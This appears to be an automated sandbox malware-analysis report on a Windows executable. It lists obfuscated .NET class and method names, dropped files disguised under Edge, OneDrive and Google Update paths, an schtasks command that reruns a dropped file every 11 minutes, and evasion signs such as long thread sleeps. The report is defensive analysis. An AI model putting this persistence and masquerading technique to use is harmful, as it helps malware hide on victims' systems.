                              Source: 0JLWNg4Sz1.exe, g1lOkGZxrBxCWmoVRYP.csHigh entropy of concatenated method names: 'MSnZaohooQ', 'hrlZvP15WE', 'otKZz159uZ', 'FdKh6N3fS1', 'r2qhbnyZvv', 'qRthm08NRk', 'YO2hPRRlVW', 'ggZhAjrAdR', 'bt1hI3CyZb', 'xYXh8PHeZy'
                              Source: 0JLWNg4Sz1.exe, NldO1wI1ZRNSSGGvm6u.csHigh entropy of concatenated method names: 'PthIwIJLJ8', 'ULbIB3ha3n', 'sZ6IDRYSZC', 'gJAtQwbpZUDyBNN07sNV', 'N91UmIbpMgxRjF5vvylT', 'QtLsMMbprc4OUbYtsNMS', 'SfhInbAHfD', 'lJMItWhp2c', 'Th9Ch7bp74KGauiXEFvC', 'VN9DaJbpqwTeWwZqcmfF'
                              Source: 0JLWNg4Sz1.exe, UDNl7ZJ1t2cRHZPrh9Z.csHigh entropy of concatenated method names: 'DXa8YpbjOuncu01UesLB', 'F19w23bj1IMwTFujDU03', 'Sg8Js2bjsKPY0N7d7KUM', 'nMeeXAbji8LMBU8Y0C5c', 'method_0', 'method_1', 'JcfJoRYe4X', 'TeBJWMfvnd', 'ggcJSpWQ52', 'xaFJLijZC2'
                              Source: 0JLWNg4Sz1.exe, wgUbhRRmoxBiwNGOuoV.csHigh entropy of concatenated method names: 'NMCRAsyWOH', 'qUHRI7ok7V', 'V9KR8qaIyv', 'kppR48MouJ', 'kIIRQpGd7q', 'VirRRuyIsL', 'FrZReynXXD', 'XguR3awwZl', 'UIeRYGkbjj', 'pvfRsBLEUH'
                              Source: 0JLWNg4Sz1.exe, W1MqfXdJMaPI8y9q2Sv.csHigh entropy of concatenated method names: 'caFci0PaYt', 'ctdfKhbEH0BIHn6P6weO', 'oIGLPIbEjJxSmVE7HSml', 'XFL7Q8bElOSpdccYEiyI', 'kPxubGbEXkB57qR1i9CW', 'kt5', 'AHFdCTtBjn', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                              Source: 0JLWNg4Sz1.exe, kYSjZaDh6h9BTBOkcKV.csHigh entropy of concatenated method names: 'OY6DjMhrKE', 'u5SDlLZ476', 'bjYDHhX029', 'iAkDXRR7cU', 'a6qD0MlvOU', 'EbTD2Zq7Ji', 'EFHDyCyuQn', 'DVoDEUtfCa', 'BW3DGFsmhL', 'F44DTXxjLZ'
                              Source: 0JLWNg4Sz1.exe, S6TtBBaZoTTKOAkZZlK.csHigh entropy of concatenated method names: 'Vsjb8d3UJCi', 'PA7b8cqSI81', 'cbIb87IJQLm', 'RlLb8qn5v7k', 'NgWb8fMeX6q', 'qcjb8MPp5BL', 'KHeb8rjcHh1', 'jQnvISQ1hN', 'pM4b8Z5Z0QD', 'IH2b8hGIbgN'
                              Source: 0JLWNg4Sz1.exe, M9vuuWx6GBvjLeTm4nX.csHigh entropy of concatenated method names: 'HYfxAPK7xC', 'eJtxI0Tq4w', 'q3OHNUbF9MGVC4bu37r4', 'YJRvNfbFZ7shy4aThuwg', 'pqY9e3bFh1iac7KWmqFr', 'JxwYkXbFjEdjmiYfZCCl', 'jsfV46bFl9DU691aE52W', 'mRxZLmbFHm69jh40uZpt', 'si7xmUQSyt', 'wTlufGbFqAXPpPYrDh7c'
                              Source: 0JLWNg4Sz1.exe, jhG8A4QhyucfjXMipUP.csHigh entropy of concatenated method names: 'P9X', 'XimbQYKJlSi', 'imethod_0', 'bdhQjhC2QU', 'yOGXRcb7vThrTt5NgHae', 'aPueChb7zU4SxSSFTCHs', 'Ameqfsbq68Pc4WSavAE5', 'b6kNHrbqb9W3po1BGRgK', 'pcC78xbqmrGWcjR8Bk1S'
                              Source: 0JLWNg4Sz1.exe, xl4l8n4bGNxEn79Hq5X.csHigh entropy of concatenated method names: 'iGQ4PVxUDq', 'ccY4AmvxZX', 'qbo4IdENRX', 'pVixutbcRHYi5MJ3ZLVi', 'phZP45bc4dWjZyRdmI9C', 'zwIpxHbcQRwBc2UDg2rO', 'VT66QFbceVHRelrVG3wy', 'IXZVmGbc31io9O9BGrRd', 'xh8CDSbcYEuXt4VmKuyF', 'DNGlQcbcs8WGfXZBrZbF'
                              Source: 0JLWNg4Sz1.exe, LoGmZY4pgRVQxt1yNTZ.csHigh entropy of concatenated method names: 'eoG4cxKTI8', 'iAh47j9tn7', 'i64Qinbc20xdggfYDg5f', 'D0YVL0bcXy14x2ThpQQE', 'alI5a9bc0Q2J3krx67Ft', 'PI0no1bcyodUYBE4oyvr', 'jD8N1YbcEr5WJ6Fn7kOn', 'WCjDjZbcG22taZlH3xFs', 'hHWru1bcTCCDmk07DeXQ', 'dnHgXybcKHClnG50tJQT'
                              Source: 0JLWNg4Sz1.exe, twGaCcfxExm4QVpv4X3.csHigh entropy of concatenated method names: 'b76', 'method_0', 'q7Q', 'K41', 'vEh', 'pu6', 'Xk4', 'K81', 'YV4', 'method_1'
                              Source: 0JLWNg4Sz1.exe, dZF6KOVnHUCFSiJA1fN.csHigh entropy of concatenated method names: 'ydgVVaxVj4', 'ROWVghusDZ', 'ALxVwODZo8', 'NdWVBqpcd1', 'E9AVDcBJt7', 'Jtn2vHbH2dNen3LM9NBi', 'sSMYYxbHXym88ZTAkeDI', 'OXBHpibH0vQGT9BG9RYy', 'ufOf5UbHyAPdQpEg6R0h', 'K17pv5bHExfvUIPGpYFr'
                              Source: 0JLWNg4Sz1.exe, cTsTGcaWXYIhqk3nyC4.csHigh entropy of concatenated method names: 'kmNaDpUZgA', 'pcwauxICB6', 'iEwap69FTG', 'd6SadT1YZH', 'lPDacEiR8U', 'BPqa7SXSd1', 'gYxaqVomLk', 'R3TafdLpFR', 'Q84aMST7LK', 'UfLar02Hdm'

                              Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, File created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, File created: C:\Recovery\StartMenuExperienceHost.exe
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe, File created: C:\Users\user\Desktop\KjTCumlu.log
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, File created: C:\Users\user\Desktop\ALzNWdSZ.log
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, File created: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, File created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, File created: C:\Recovery\DViaOgnvmAhwCXZ.exe

                              Boot Survival

                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe, Process information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe, Process information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 1860000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 1B460000 memory reserve | memory write watchJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeMemory allocated: 1A6C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeMemory allocated: 1900000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeMemory allocated: 1B2F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 840000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 1A400000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 16B0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 1B320000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeMemory allocated: 17E0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeMemory allocated: 1380000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeMemory allocated: 1AE90000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1440000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1AFE0000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1170000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1AE10000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1230000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1AC70000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599873Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599765Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599656Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599546Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599437Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599328Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599218Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599109Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598999Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598890Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598781Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598671Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598562Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598453Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598343Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598234Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598125Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598014Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597906Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597796Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597686Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597578Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597468Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597358Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597250Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597140Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597031Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596921Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596812Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596586Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596484Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596374Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596256Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596125Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596012Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595905Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595796Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595684Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595578Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595468Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595359Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595250Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595140Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594921Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594812Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594703Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594583Jump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeWindow / User API: threadDelayed 1994Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeWindow / User API: threadDelayed 7798Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\KjTCumlu.logJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeDropped PE file which has not been started: C:\Users\user\Desktop\ALzNWdSZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 7580Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 7764Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599873s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599765s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599656s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599546s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599437s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599328s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599218s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599109s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598999s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598890s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 4296Thread sleep time: -3600000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598781s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598671s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598562s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598453s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598343s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598234s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598125s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598014s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597906s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597796s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597686s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597578s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597468s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597358s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597250s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597140s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597031s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596921s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596812s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596586s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596484s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596374s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596256s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596125s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596012s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595905s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595796s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595684s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595578s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595468s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595359s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595250s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595140s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595031s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -594921s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -594812s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -594703s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -594583s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe TID: 7964Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 5816Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 2736Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe TID: 2688Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\StartMenuExperienceHost.exe TID: 2800Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\StartMenuExperienceHost.exe TID: 2692Thread sleep time: -922337203685477s >= -30000s
